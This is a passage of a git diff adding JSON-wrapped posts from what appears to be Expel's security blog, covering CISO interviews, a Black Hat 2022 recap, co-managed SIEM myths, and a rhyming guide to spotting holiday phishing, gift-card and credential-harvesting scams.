the plate and step outside of ourselves to meet completely unexpected and phenomenal challenges (we\u2019re on a hiatus from using \u201cunprecedented\u201d). And in the tech world, we saw the role of the CISO evolve \u2013 pushing a member of the C-suite who\u2019s used to working behind the scenes to being front and center. Now that we\u2019re finally reaching the end of 2020, we\u2019re taking a moment to look back. So, I sat down (virtually) with Expel\u2019s CISO, Bruce Potter, to reflect on this year \u2013 how we overcame the challenges it presented and what anyone in security should be thinking about as we enter a post-2020 world. There are many things that won\u2019t go back to being the way they were before 2020. Do you think the role of the CISO is one of those things? Yes. I think that coming out of 2020, CISOs will have a more central role in businesses. CISO\u2019s have been front and center in many organizations\u2019 pandemic response. The ability to meet risk objectives while working remotely is the only way most businesses can continue to operate. And in the case of the CISO, that meant many of them had to complete remote work projects in days that would have otherwise taken years. The success of a company\u2019s remote work strategy is in large thanks to the work of the CISO. During my time as a CISO, I\u2019ve learned to focus more on rapid understanding of a problem and leveraging experts to get a solution out fast we can iterate on. It gets us better near term defenses and in the long run is less resource intensive. This is something every CISO needed to quickly master this year. I think security really is an enabler during COVID and many executives see that a good CISO can be a differentiator, not just something required for regulatory purposes. I expect CISOs to be elevated in org charts and be responsible for broader swaths of risk, not just cyber. Everyone wants to know \u2013 what are the biggest security threats we should be aware of? Social engineering. Far and away, that\u2019s what takes down companies. From the latest Twitter hack to some of the earliest attacks on the Internet, social engineering is still the number one way companies get compromised. Combined with ransomware tooling, the impact can be devastating. We\u2019re a long way off from solving this issue as we generally have poor authorization schemes in our organizations. Users tend to have far more access to data and systems than they need, but solutions to help with that are few and far between. It\u2019s clear that orgs can\u2019t get away with not taking security seriously. What did you include in your 2021 planning? We\u2019re focusing on three major areas for 2021: 1. Product and software security. Looking beyond the security of your enterprise and focusing on the security of the services and products you are developing is an important part of the overall security of an organization, but sometimes it falls outside the scope of the CISO\u2019s role. In our case, it\u2019s squarely my responsibility and it\u2019s a huge focus for us in 2021. 2. Formalized risk management. Paying attention to security tech is only one part of a functional security program. Having formalized processes around security and privacy risk management is a function that is often more \u201cseat of the pants\u201d than a formalized thing. We\u2019re working to codify our risk management processes to make our risk management a more repeatable and efficient process. One thing we\u2019ll continue to do here: Not rely on vendors to tell you what questions to ask when it comes to assessing third-party risk. We\u2019ve developed our own third-party questionnaire and narrowed it down to 10 (what we think are really good) questions. 3. Cloud authorization. We\u2019re cloud native so it means we\u2019re all cloud all the time\u2026 and as much as we have sign-on signal (SSO) \u2013 we don\u2019t have centralized fine grained access control to cloud services. We have to configure authorization for each service, which doesn\u2019t scale (obviously). It\u2019s time to fix it. Expel recently gained ISO/IEC 27001:2013 certification and integrated the ISO/IEC 27701:2019 extension to our certification. Does this mean that all orgs should do this? The simple answer is \u201cmaybe.\u201d It depends on if your customers care about how secure you are. The answer for a law firm (as an example) vs. a SaaS provider is probably very different. When you\u2019re providing online services, you need to be able to express to your customers, in a very believable way: \u201cWe know what we\u2019re doing from a security perspective.\u201d There\u2019s a lot that goes into that, including transparency in operations, having good processes and procedures and having an architecture that lends itself to securely handling customer data. ISO27001 and ISO27701 are great certifications that can help you demonstrate this to customers. While certifications aren\u2019t the be-all-end-all when it comes to building trust, they\u2019re a fantastic starting point. Looking back at the dumpster fire that is 2020 \u2013 are there any lessons that you couldn\u2019t anticipate needing to learn but you will now keep in your toolbox moving forward? I couldn\u2019t anticipate that one day I\u2019d need to get every single member of my company working fully remote within a 72-hour timeframe. We ended up spending a lot of the year being concerned about our employees, their welfare and the quality and security of their home networks. Being successful in 2020 required having a very personal touch and view of our security controls. I think keeping that customer focus going forward will allow us to have low-friction security solutions that people don\u2019t work around or ignore. It\u2019s safe to say that CISOs were in pretty high demand when it came to interviews. Is there a question you wish someone asked you this year but didn\u2019t? How has productivity and innovation been impacted by working from home? It may seem like a CIO or COO type question, but I think security has a big impact on this as well. The security controls in place when collaborating in person (say in a conference room) vs. remotely (Zoom? Slack? Virtual whiteboard?) are very different. Ensuring that your security program is not getting in the way of collaboration and productivity is very important. Ideally, your security program enables collaboration and productivity. Ensuring your actions as a CISO are aligned to the business needs, not just business security needs, can be a real differentiator this year. Let\u2019s hear it for the CISOs! Seriously, thank you. To say that working through this year wasn\u2019t easy is an egregious understatement. We\u2019re appreciative of Bruce \u2013 and our entire Expel team \u2013 for never skipping a beat when it comes to keeping our customers and our Expletives safe. We hope these insights are helpful to you as you complete your 2021 planning. Do you have any burning questions that we didn\u2019t cover? We\u2019d love to hear them !" +} \ No newline at end of file diff --git a/the-cycle-continues-black-hat-usa-2022-day-2-recap.json b/the-cycle-continues-black-hat-usa-2022-day-2-recap.json new file mode 100644 index 0000000000000000000000000000000000000000..92dd06225bbe571ab81e6567a82a6123815c5668 --- /dev/null +++ b/the-cycle-continues-black-hat-usa-2022-day-2-recap.json @@ -0,0 +1,6 @@ +{ + "title": "The Cycle Continues: Black Hat USA 2022 \u2014 Day 2 Recap", + "url": "https://expel.com/blog/black-hat-usa-2022-day-2-recap/", + "date": "Aug 12, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG The Cycle Continues: Black Hat USA 2022 \u2014 Day 2 Recap Expel insider \u00b7 3 MIN READ \u00b7 ANDY RODGER \u00b7 AUG 12, 2022 \u00b7 TAGS: Company news Black Hat USA 2022 has officially wrapped, and the attendees will soon leave the heat of Las Vegas behind to go back to their organizations with some fresh perspectives on fighting the good fight. The day 1 theme of community was prevalent from the get-go again today, starting with the keynote address. Once again, Jeff Moss kicked things off, addressing the evolving relationship the Black Hat community has with the media. Moss pointed out that Black Hat has always been about bringing new voices to the infosec community and that includes the press. Unfortunately, the press hasn\u2019t always been so kind to the group, resulting in a love/hate relationship. Like any organization, Moss pointed out, a good media interview can result in showcasing the community\u2019s great work and educating the public about cybersecurity topics, while a bad interview can cast its work in a negative light or perpetuate the \u201ccriminal\u201d hacker stereotype. Thankfully, as cybersecurity issues have become more mainstream, the community\u2019s relationship with the press has evolved in a positive way. Moss then welcomed to the stage, Kim Zetter, an author and investigative journalist with an impressive r\u00e9sum\u00e9 that includes cybersecurity writing roles at WIRED, the New York Times Magazine, the Washington Post, Yahoo! News, Vice Magazine, and more. One would be hard-pressed to find a more appropriate journalist to address the Black Hat crowd. Zetter explained that in the beginning of her career, cybersecurity reporters almost exclusively worked for tech press. The mainstream media would assign a general reporter to the story only when a major incident occurred. Over the last 10 years or so, the major news outlets woke up and realized the importance of hiring reporters to translate security to the general public. Zetter\u2019s presentation, titled \u201cPre-Stuxnet, Post-Stuxnet: Everything Has Changed, Nothing Has Changed,\u201d examined decades of cybersecurity developments, including the lead-up to the Stuxnet discovery in 2010. That discovery opened the eyes of the security community to a sector it previously ignored: the operational networks and industrial control systems that manage critical infrastructure. This was when cybersecurity became linked to national security. Since Stuxnet, the cybersecurity industry has made tremendous strides. Security technology is far more advanced than in 2010, and despite all their work, organizations still suffer from incidents that have major consequences\u2014-and that were totally predictable (we might even say preventable). Zetter explained that organizations will always experience incidents that no one saw coming, but they could foreshadow more incidents before they occur. So while it\u2019s important that we look back at the history of watershed cybersecurity events, we must also watch for the signs of what\u2019s to come\u2014and take the proper precautions to prepare now. This sentiment was present\u2014albeit to a lesser degree\u2014in the session by Nathan Hamiel titled, \u201cFrom Hackathon to Hacked!: Web3\u2019s Security Journey.\u201d This presentation examined the security maturity of Web3 projects, built on blockchain technology. While the tech community recognizes the term \u201cWeb3,\u201d it\u2019s still an emerging technology with some kinks to work out. When combined with the fact that small teams, with no security systems or safeguards in place, run many of the Web3 projects, these projects become juicy targets for cyber criminals. Even though Web3 is still such a nascent space, it faces a lot of the same challenges as the nation\u2019s critical infrastructure. There are basic security best practices that both areas still don\u2019t follow. And this is true across the business landscape. At Expel, we often see companies not applying patches, or lacking simple email filters to reduce phishing attempts, or misconfiguring their cloud settings. So what should we as an industry do? It comes back to community. We should heed the advice of Kim Zetter, and pay close attention to the warnings of impending vulnerabilities and ransomware attacks to sense what\u2019s coming, and take the appropriate steps to prepare. Security challenges are only increasing in sophistication and frequency, and we can\u2019t wait for major incidents to happen before dealing with them. While this all sounds very dire, if Black Hat USA 2022 showed anything, it\u2019s that this community is able to meet these challenges head on, and usher in a new age of security." +} \ No newline at end of file diff --git a/the-dinner-that-started-it-all-with-expel-s-new-ciso.json b/the-dinner-that-started-it-all-with-expel-s-new-ciso.json new file mode 100644 index 0000000000000000000000000000000000000000..0f72c9569b14be13127458139ad7f5ba331292b9 --- /dev/null +++ b/the-dinner-that-started-it-all-with-expel-s-new-ciso.json @@ -0,0 +1,6 @@ +{ + "title": "The dinner that started it all with Expel's new CISO", + "url": "https://expel.com/blog/the-dinner-that-started-it-all-with-expels-new-ciso/", + "date": "Apr 12, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG The dinner that started it all with Expel\u2019s new CISO Talent \u00b7 3 MIN READ \u00b7 GREG NOTCH \u00b7 APR 12, 2022 \u00b7 TAGS: Company news Expel recently welcomed a new face to the executive team with the addition of Greg Notch as Chief Information Security Officer (CISO). Fresh off of 15 years as CISO and Senior Vice President of Technology at the National Hockey League (NHL), Greg has been in the security and tech biz for over 20 years \u2014 helping companies large and small through all three dot-com booms. As Expel\u2019s CISO, he ensures the security of our systems, and keeps customers educated on the threat landscape and latest techniques for mitigating risk in their environments. In this post, get to know Greg and what drew him to Expel, in his own words. The dilemma A little over five years ago, my company tasked me with building our information security program. As I sat in my office, I faced a seemingly impossible problem: the current approach to info security programs involved solving several complex problems simultaneously. Conventional thinking for an enterprise security program said you first had to buy a bunch of security tools and gather logs from the tools and the rest of your environment. Then you bought a security information and event management (SIEM) tool and jammed in all that data. Next, you hired and staffed a security operations center (SOC) team to sift through the data and respond to what they found. Honestly, that sounded terrible. This \u201csolution\u201d created two other problems to solve: how to manage all those tools and data, and how to staff the organization that would deliver actions and outcomes from the pile of data. Both are difficult, but building a SOC with the expertise and experience necessary to handle it can be especially daunting. Not to mention, if you wanted it to be a 24\u00d77 operation, it involved hiring somewhere between eight and 12 people. The only obvious alternative was to outsource this entirely to a company that would make all the technical and staffing decisions for you. But the players in the market at the time weren\u2019t making decisions based on individual customer needs; they were focused on what was economical for them to provide as a service. After several conversations with peers who used these services, it appeared that none of those services took any context from the customer, which meant endless reams of meaningless alerts from your own tools \u2014 usually at a substantial cost. Spoiler alert: None of these options sounded appealing. I\u2019d worked with venture-backed businesses previously, so this gap in the market seemed to me like a good opportunity to reach out to my venture capitalist (VC) friends for advice. In my experience, venture-backed businesses are a successful way to solve problems the market isn\u2019t adequately addressing. When successful, this approach has the added virtue of being to everyone\u2019s benefit (my security program, the company, and the venture backers). I began expressing my exasperation to VC folks, explaining that there must be a better way and asking, \u201cWhy isn\u2019t there a platform to solve this problem at scale?\u201d Most responded that it was an industry-wide dilemma, and that it likely wasn\u2019t solvable \u2014 at least not with software. The path to Expel Somewhat dejected but undeterred, I headed off to D.C. for a security conference. There, one of my VC friends set up a meeting with \u201cfolks who may be trying to solve that problem you keep pestering us about.\u201d Intrigued, I met Expel\u2019s co-founders Yanek, Merk, and Justin for dinner and the rest is, well, the stuff of legends. They saw the same problem and had a compelling plan for how to solve it. At the end of the meal, I remember asking them: \u201cSo\u2026 when can you start?\u201d To which they responded, \u201cWe should probably set up a company first.\u201d That company was, of course, Expel. Since then, I\u2019ve watched as they built an amazing team and company, founded on core values and a culture that I didn\u2019t think was possible. They delivered on every commitment, big or small, and every interaction I had with the Expel team was thoughtful, humble, and relentlessly customer-driven. The values permeated the entire company, and I saw that it was the sort of place where anyone would be lucky to work. Now I have the distinct privilege of joining that team, and becoming an Expletive. I\u2019m looking forward to continuing the journey." +} \ No newline at end of file diff --git a/the-grinchy-email-scams-to-watch-out-for-this-holiday-season.json b/the-grinchy-email-scams-to-watch-out-for-this-holiday-season.json new file mode 100644 index 0000000000000000000000000000000000000000..8d71f2c08a63f16b7830e27ccfc0d23c4d9963d5 --- /dev/null +++ b/the-grinchy-email-scams-to-watch-out-for-this-holiday-season.json @@ -0,0 +1,6 @@ +{ + "title": "The Grinchy email scams to watch out for this holiday season", + "url": "https://expel.com/blog/the-grinchy-email-scams-to-watch-out-for-this-holiday-season/", + "date": "Nov 22, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG The Grinchy email scams to watch out for this holiday season Security operations \u00b7 9 MIN READ \u00b7 RAY PUGH \u00b7 NOV 22, 2021 \u00b7 TAGS: MDR As the holidays near, there\u2019s so much to excite! It\u2019s that time of year, with sales left and right. Cheer fills the air and there\u2019s no time to wait For holiday shopping \u2013 don\u2019t want to be late! But as you shop online and check email this season, Watch out for these scams \u2013 with very good reason. With celebrations and work and no spare time to mention, Don\u2019t let Grinches in while not paying attention. They want to steal info and data galore, Gift cards, credentials, and so much more. So here\u2019s what to know to avoid falling prey \u2014 Keep your inbox secure through these holidays. Who ordered all that Who Hash ?!?! Aka: Fake shipping notifications Our security operations center (SOC) saw several of these scams, and we expect them to ramp up around the holidays. Holiday Grinches (aka attackers) send fake shipping notifications, often posing as legitimate retailers, hoping to trick recipients into providing personal information like card numbers, login credentials, or other details. For example, we investigated this fake Amazon notification earlier this year, which claimed an order was on its way to the recipient. Fake Amazon shipping notification email The attacker\u2019s goal is to make the recipient think this is an actual order incorrectly placed through their account (or that maybe their account was hacked), with the large dollar amount (over $1,400 in this case) causing concern that the recipient will be stuck with the bill for an item they didn\u2019t order. There are no clickable links in the email, which steers the reader to the Support Desk phone number listed in bright red at the bottom. Our Grinchy sender hopes recipients will call that number to dispute the order, then poses as customer service on the phone to ask for \u201cnecessary account information\u201d to help the recipient sort out the issue. If successful, this type of scam would result in the attacker obtaining account credentials, credit card numbers, or other sensitive personal information from the concerned recipient. These fake shipping notices are a common attacker tactic \u2014 see another example below where a fake shipping notice prompted the recipient to click a link and provide personal information to reschedule a \u201ccanceled\u201d delivery. Fake shipping notification email The holiday season is a perfect time for would-be Grinches to raise their odds for success with these tactics as online shopping reaches peak levels for the year. A Who\u2019s to-dos: Got an email about an order or delivery you didn\u2019t place? Shipping confirmation that looks kind of sketchy? Here are some things you can do to avoid falling prey to this Grinchy scam: Double check the email address the shipping/delivery notice came from. Does it look legitimate? Does it match other shipping confirmation emails you\u2019ve previously received from the same company for orders you placed? If not \u2013 it\u2019s likely a scam. Check the email for errors \u2013 is the company\u2019s name or other text misspelled? Is the language odd or stilted? These could be signs that the email isn\u2019t legitimate since companies go to great lengths to make sure their emails are largely error-free. If you have any suspicions that an email might not be legit, don\u2019t click any links or call the phone number provided in the email \u2013 and definitely don\u2019t give them any of your personal information! Instead, look up the verified customer service number for that company online and go through their legitimate support center to look into the order or delivery. If they can\u2019t find it, it\u2019s a good sign it was a scam. That\u2019s not Santa \u2013 that\u2019s the Grinch! Aka: CEO impersonation The TL;DR for this one: unless it\u2019s a regular part of your job, it\u2019s probably safe to assume your boss wouldn\u2019t ask you to do her holiday shopping. We see a number of campaigns come through our SOC every year where Grinches dress up like Santa and try to rope employees into helping them steal all the gifts (or gift cards, in this case). For example, in the email below, our Grinch created an email address imitating that of the company\u2019s CEO and targeted a company employee, asking to speak offline about a \u201cpersonal errand.\u201d CEO impersonation email request Attackers often like to move the conversation away from email to lower the chance of being discovered. Asking for cell phone numbers allows them to use calls or texting for further interactions. We\u2019ve seen similar emails with language like: \u201cSend me your cell phone number for an urgent task\u201d \u201cKindly reconfirm your cell phone #, I need a task done immediately\u201d \u201cPlease kindly resend your cell phone number to me\u201d Our gift-stealing Grinches then usually ask their victims to purchase gift cards and send pictures of the redemption codes. Communicating by text/smartphone makes receiving that info quick, easy, accessible, and fairly anonymous. And the victim is then out the money they spent on the gift cards with little recourse to get it back. Attackers often use publicly-available information like org charts on a company\u2019s website or networking sites like LinkedIn to perform reconnaissance and target individuals who are newer to the company and likely eager to impress their boss. Which means, historically, we\u2019ve seen interns, new graduates, and other new hires frequently targeted in these scams. So what can you do to keep the cyber Grinches from looking like this ? A Who\u2019s to-dos: If you receive an unexpected email from \u201cyour boss\u201d asking you to contact them offline or purchase things for them that aren\u2019t part of your regular responsibilities, first: don\u2019t respond or give them your number! Second, contact your boss through another channel of communication like your company\u2019s instant messaging app, a new email to their verified company email address, or a phone call if you have their number. Confirm whether they sent the request. If not, it was likely a scam and you should report it to your company\u2019s IT/security team. If the person reaching out isn\u2019t someone you normally talk to, find someone in your network who can reach them through legitimate channels. Click this link to see your Whobilation invite! Aka: Credential harvesting through phishing The hustle and bustle of the holiday season is perfect timing for another Grinchy favorite \u2013 catching busy Whos off-guard with phishing emails posing as legitimate business activities to harvest recipients\u2019 login credentials. A common tactic is for attackers to send an email pretending to share a legit business document (an invoice that needs signing, a contract, etc.) through a file-sharing application like DocuSign, Microsoft OneDrive, or Microsoft Office365. The link in the phishing email then takes the recipient to a credential harvesting portal posing as a login page for one of those file-sharing services. When the recipient enters their login info to access the document, the attacker captures that information and can then use it to access that recipient\u2019s inbox (and potentially other parts of an org\u2019s systems and applications if business email credentials are captured). Below is an example of a fake login portal we\u2019ve seen. There are often subtle differences (like typos, missing or different images, abnormal language) between these fake portals and the real login pages, but attackers hope busy employees won\u2019t stop and notice these abnormalities. Credential harvesting page posing as a Microsoft login page This page may look legit at first glance, but the URL in the browser shows that this is definitely not a Microsoft-owned page. Another common tactic Grinches use to collect credentials is sending recipients a PDF file to download (again posing as a legitimate business document like an invoice or contract). Sometimes PDF, ZIP, and other files attached to phishing emails are password protected to circumvent companies\u2019 security tech. The attacker then includes the password in the body of the email, allowing their victims to open the document and interact with whatever\u2018s inside (this is also a common method for attackers to insert malware onto targets\u2019 computers). Within the PDF, attackers will instruct recipients to access a link in the document. The link often redirects multiple times before ultimately landing on the attacker\u2019s credential harvesting page, again usually imitating a legitimate login page to trick potential victims into entering their credentials. Once a Grinch has stolen a recipient\u2019s credentials and gained access to their inbox, they typically look for emails about invoices or other financial information to insert themselves into the conversation and attempt to divert payments to a different account they\u2019ve set up. In one example, we saw an attacker successfully divert payment for a person\u2019s African safari vacation into the attacker\u2019s account. These phishing emails target our inclination to respond promptly to communications from co-workers, vendors, or clients if we think action is required, like returning an invoice. Subject line keywords that promote action or a sense of urgency are favorites for attackers because they prompt people to click without taking as much time to think. A Who\u2019s to-dos: If you receive an email link to access a file, or an attached file that you aren\u2019t anticipating, don\u2019t click any links or open any files right away. First double-check the sender \u2013 is this someone you know? Is their email address legitimate? If not, it could be a phishing email. If you find yourself on the login page for a file-sharing service, check if there\u2019s anything off. Are there any typos? Images that won\u2019t load? Oddly-written text or descriptions? Look at the URL \u2013 does it seem right? If you regularly use this service for work or personal file sharing, does this login page match what you usually see? If the answer to any of these questions is no, don\u2019t put your information in \u2013 it could be a credential harvesting site posing as a login page. If a suspected malicious email is sent to your work account, report it to your company security/IT team so they can check if other employees at your company were targeted by the same phishing campaign and if any accounts were compromised. While you order your Roast Beast delivery\u2026 Aka: The most important thing to do while online shopping this season We\u2019ve covered some of the top scams you should keep an eye out for in your inbox this holiday season. But what about while you\u2019re hunkered down in front of your internet browser with a double espresso, noise-cancelling headphones, and your credit cards at 12 am this Black Friday and Cyber Monday? Our most important tip \u2013 don\u2019t reuse passwords! This will help protect you from credential stuffing attacks. Credential stuffing is a type of cyberattack where cyber Grinches take one set of stolen login credentials (for example, if your username and password to a site were leaked in a data breach and can now be found on the illicit web), then use automation to try them across a variety of sites or applications. It\u2019s possible attackers will try to compromise online retailers\u2019 systems this holiday season to access credentials for their users\u2019 accounts, either by taking advantage of vulnerabilities in a retail site\u2019s security or, more commonly, through credential harvesting like we discussed above. If successful, it\u2019s easy for the attackers to then use the same credentials they obtained at other retailers or institutions, like financial providers. This can allow them to place fraudulent orders, steal credit card information stored on retailers\u2019 sites, or access their victims\u2019 financial and email accounts (where wire fraud and other financial crimes are their targets). As you register for accounts while online shopping this season, use unique, strong passwords (or better yet, passphrases!) for each site. This helps mitigate the impact if one of your accounts is compromised by keeping your other accounts secure. A Who\u2019s to-dos: Use different passwords for each of your accounts, particularly accounts that provide access to sensitive or personal information (like financial accounts, credit card information, or your address). Using a centralized password manager allows you to store unique, complex passwords for all of your accounts in a secure but easily accessible way. Use multi-factor authentication (MFA) on all of your accounts. MFA requires a second verification step beyond your login info (for example, providing a code sent to your phone number on file) to access your account. So even if an attacker gets your credentials, MFA will help prevent unauthorized access to your account until you can reset the password. Most sites and apps have an option to enable MFA for logins to your account, often with customizable preferences. Wrapping it all up Cyber Grinches are out there, hoping and wishing To steal all your cheer with some holiday phishing. So have your guard up and pay close attention To emails and websites for scam prevention! Keep your inbox secure and logins protected, And don\u2019t click on anything that\u2019s unexpected. Our top tips are below for your peace of mind To avoid cyber trouble this holiday time! Remember: Check senders\u2019 email addresses if an email is remotely suspicious or unexpected. Don\u2019t click links or open attachments from senders you don\u2019t recognize or aren\u2019t expecting. If you click a link in an email, check the URL it brings you to \u2013 does that URL look legitimate for that company? If not, don\u2019t put in any personal information. Look for abnormalities in emails or login pages that might indicate they\u2019re fake (for example: typos, missing or unloaded images, oddly-written language or anything else that differs from your typical experience with that site/provider). Don\u2019t provide personal information to anyone claiming to be customer service over the phone unless you personally called that company\u2019s verified customer service number. Double check unusual requests from your boss through another communication channel \u2013 not just by hitting reply. Report anything suspicious in your work accounts to your company\u2019s security/IT team so they can investigate and look for other instances at your org. Use unique passwords for each account you create. And a last parting thought if your org needs support For monitoring and response when there\u2019s phishing to thwart \u2013 Reach out to our team about our contribution, Expel Managed Phishing could be your solution! Have a safe and happy holiday season from all of us at Expel!" +} \ No newline at end of file diff --git a/the-myth-of-co-managed-siems.json b/the-myth-of-co-managed-siems.json new file mode 100644 index 0000000000000000000000000000000000000000..431180e1906a729319337b61924428334e677af5 --- /dev/null +++ b/the-myth-of-co-managed-siems.json @@ -0,0 +1,6 @@ +{ + "title": "The myth of co-managed SIEMs", + "url": "https://expel.com/blog/the-myth-of-co-managed-siems/", + "date": "Aug 25, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG The myth of co-managed SIEMs Security operations \u00b7 5 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 25, 2020 \u00b7 TAGS: CISO / Managed detection and response / Managed security / Management / SIEM Maybe you\u2019ve already got a SIEM and you\u2019re looking for help managing it. Maybe you\u2019re thinking of buying a SIEM and concerned it might be too much to handle on your own. Or maybe you\u2019re using an MSSP and thinking of gaining more control of your data by working collaboratively in your SIEM rather than letting them do all the work. However you\u2019ve arrived at the concept of \u201cco-managed SIEM,\u201d there\u2019s a number of potential pros and cons to think about when making your decision. It\u2019s important to really understand what you\u2019re going to get out of a co-managed SIEM \u2013 it\u2019s a big resource and dollar commitment, and mistakes made early on can take a long time to correct. Our team encounters a lot of co-managed SIEM myths. In this blog post, I\u2019ll share the most common myths we\u2019ve heard and our perspectives on the reality of co-managed SIEMs through the lens of how we do things here at Expel. 5 perceived benefits of co-managed SIEM Myth: It\u2019s the only way to get transparency. One of the biggest benefits people want from co-managed SIEM is visibility into their security operations. By working with a partner in your SIEM, you maintain some control over the detection rules that are in place, the sources of data and what your analysts are doing (regardless of whether they\u2019re YOUR analysts or your partner\u2019s analysts). Reality: There are other (better) ways to get transparency. We strongly believe that you can\u2019t build trust without transparency. It\u2019s key to being a good partner to our customers. It\u2019s also vital for efficiency and accuracy. So we\u2019ve put a lot of thought into what transparency should look like in practice. At Expel, we provide our customers with complete visibility into our analysis and investigations \u2013 in fact, we invite all our customers to watch what we\u2019re doing in Expel Workbench or talk with us in a dedicated Slack channel as an incident unfolds. We literally work alongside your analysts to prosecute events and respond to incidents. Example conversation in Expel\u2019s customer Slack channel Further, you can review all activity to check our work \u2026 make sure you agree with what we\u2019ve done and help improve detection and response capability. We want all third-party security providers to be held to the same account, since this is what we\u2019d expect from any MSSP we deal with (we\u2019re a customer of ourselves, so it works out great for us). Myth: Greater control over business logic produces more detection value. Your SIEM is the codification of business logic you use to detect specific threats inside your organization. Custom rules and configurations allow you to look for attacks tailored to your systems and architectures. A co-managed SIEM allows you to continue to maintain this business logic. Reality: The vast majority of what you detect is the same as your peers and many other companies. Orgs think they want more control to write rules and generate alerts, but they don\u2019t realize how much it costs to manage detection content. Unless you invest a lot in this area, you\u2019ll end up with a pile of false positives. In reality, your rules probably aren\u2019t as unique as you think. Your provider has an advantage since they see the big picture (AKA lots of customers) and have the expertise to manage the detection content. However \u2026 You should expect your security provider to tailor their detection strategy for you to your business. This could mean fine tuning rules that already exist, taking advantage of rules you\u2019ve written in your SIEM or working together to build new rules in our platform. Have a suggestion? No problem. Just let us know and we\u2019ll work to understand the use case and ensure you\u2019re covered. No matter what security provider you work with, once you share your suggestion they should do the rest. Myth: You\u2019ll get assistance from outside experts. By going to a co-managed SIEM, you\u2019re hoping to take advantage of the collective knowledge from your service providers. Presumably your provider has seen lots of good and bad and can advise you and your team on doing SIEM better. You\u2019d also think that they will answer general security questions and concerns you may have. Reality: You should expect this assistance from your third-party security partners. Once again, your third-party security partner shouldn\u2019t just process alerts. MSSP\u2019s have lots of institutional knowledge they can share to help improve your broader security program. We work to push as much information to our customers (and publicly) as we can to help everyone make their organizations more secure. Further, our engagement managers are a window into Expel that can get you answers to tough security questions. Myth: My SIEM will have all of the data required for detection and response. Many organizations envision their SIEM as the single place where all data exists for detection and investigation.Thinking about co-managed SIEM as a strategy doubles down on this assumption as you\u2019re paying for a provider to help manage that signal and detection content. The hope is that your SIEM will provide visibility across the entire environment and enable your team to respond to all kinds of threats. Reality: Storing data in a SIEM is a lot of work.. Getting all the data that you want into a SIEM can be an exhausting process. And making sure it continues to go into a SIEM isn\u2019t much easier. We\u2019ve built API integrations with over 45 different vendors. We learned pretty quickly that data sent to a SIEM is not nearly as rich as data that can be pulled from API \u2013 which can inhibit detection and response with a SIEM. As organizations increasingly use cloud applications and infrastructure, the vision of the SIEM as a single source of truth starts to make less sense. So it\u2019s important to evaluate why you need (or think you need) a SIEM. There will be instances when sending your data to a SIEM is a wise choice (we\u2019ll explore this a bit more in a future blog post). But, for example, you don\u2019t need to store those Office 365 or AWS logs in your SIEM when your cloud provider is already storing them for you and your MSSP can consume them directly. That\u2019s why we connect directly to cloud providers \u2013 meaning that regardless of the choice you make, you\u2019ll always get the visibility you need. And the reality that\u2019s all too familiar \u2026 This is a big one. It\u2019s \u201ctoo many cooks in the kitchen.\u201d One of the problems with a co-managed SIEM is orchestrating who is doing what. A SIEM is a big piece of technology and dividing up responsibilities can be confusing. Who handles upgrades? Who\u2019s responsible for rule QA? Who handles device integration? How about analyst shifts? If the answer is \u201cit depends\u201d \u2013 expect friction! By having a third-party security partner rather than a co-managed SIEM, the roles are clearer for both your staff and the service provider. Avoiding confusion at this stage helps ensure you\u2019re focused on the right issues (like generating good signal, minimizing noise and detecting bad actions) and not wasting time on RACI charts and scheduling. The chart below gives you a general idea of how we might assign roles at Expel: Roles and responsibilities with third-party security partner Responsibility Co-Managed SIEM Expel System Upgrades Provider You Log Source Onboarding Both You Health Monitoring Both Expel Rule Management Both Expel Alert Triage & Investigation Both Expel Reporting Both Expel Remediation You You The value in SIEMs We think SIEM\u2019s are a valuable part of an organization\u2019s security architecture. When properly fed, they are the source of truth for an investigation. The information and analytical capability in your SIEM can be invaluable for analysts and investigators when working through the trail of alerts and data involved with suspicious activity. Further, SIEMs are great data normalizers.Taking in unstructured data, providing structure and storing in an orderly way can open up many more opportunities for signal generation in your company. Data that might otherwise go ignored can be put to great use in your SIEM. Finally, they\u2019re great tools for your analysts. From experimentation to ongoing operations, a good SIEM and staff that know how to use them can fulfill their promise \u2026 serving as a focal point for your security operations. However, even the best SIEM needs people. If you don\u2019t have in-house expertise and are thinking about co-managed SIEM as an option, consider these common myths and what you could accomplish by asking more of your third-party security partner. A service (like Expel) that can transparently use your SIEM can be a real game changer in your security program. Let us know if you want to chat ." +} \ No newline at end of file diff --git a/the-security-people-s-guide-to-expel-s-exe-blog.json b/the-security-people-s-guide-to-expel-s-exe-blog.json new file mode 100644 index 0000000000000000000000000000000000000000..f2efffdcd7b921aa63c754b4c3133112a203e37f --- /dev/null +++ b/the-security-people-s-guide-to-expel-s-exe-blog.json @@ -0,0 +1,6 @@ +{ + "title": "The security people's guide to Expel's exe blog", + "url": "https://expel.com/blog/security-peoples-guide-expels-exe-blog/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The security people\u2019s guide to Expel\u2019s exe blog Expel insider \u00b7 2 MIN READ \u00b7 DAVE MERKEL \u00b7 AUG 24, 2017 \u00b7 TAGS: Announcement / Company news \u201cRemember that time we started an information security company?\u201d Yeah, yeah I do. Twice. Who would do that, you ask? Who would first commit one of the classic blunders (quick recap for those that don\u2019t know the list, they are: 1) land wars in Asia, 2) mixing death and Sicilians, and slightly less well known 3) building endpoint security products) AND THEN jump back into \u201cthe cybers\u201d for another go-round? Me, I guess. I\u2019m that guy. I\u2019m the guy that also commits the rarely cited, but oh so true, fourth classic blunder: volunteer to write the first post of a new blog. By \u201cvolunteer\u201d I, of course, mean \u201cfailed to outrun marketing.\u201d Hi everyone, I\u2019m merk (this is where you say \u201chi merk\u201d). My given name is David, and I\u2019ve occasionally been called Dave, but if you want to get my attention in a crowded room to, say, get you another beer, I recommend sticking with \u201cmerk\u201d. No caps please, it cramps my style. My colleagues and I at Expel are new here. You\u2019ll be hearing quite a bit more about us in the future. So let me take just a couple minutes to introduce who we are and why you might care. Note I said who we are, not what we do. We\u2019re not quite ready to talk about that yet, but stay tuned. I should probably start using buzzwords here, like luminary or perhaps ninja . World renowned and market-leading should also show up. However, who we are could best be summed up as not those people . We do what we do because we love information security, love helping our customers, love working with each other, or some combination of all three. We\u2019re not big fans of how information security companies talk about themselves, but we are big fans of cool infosec things, whether they\u2019re new technologies, attack methods, intelligence analysis, or even just lessons learned from a hard day at the office\u2026 and holy crap do I have a ton of those. My best stories usually start out like this: \u201cLet me tell you about the time I 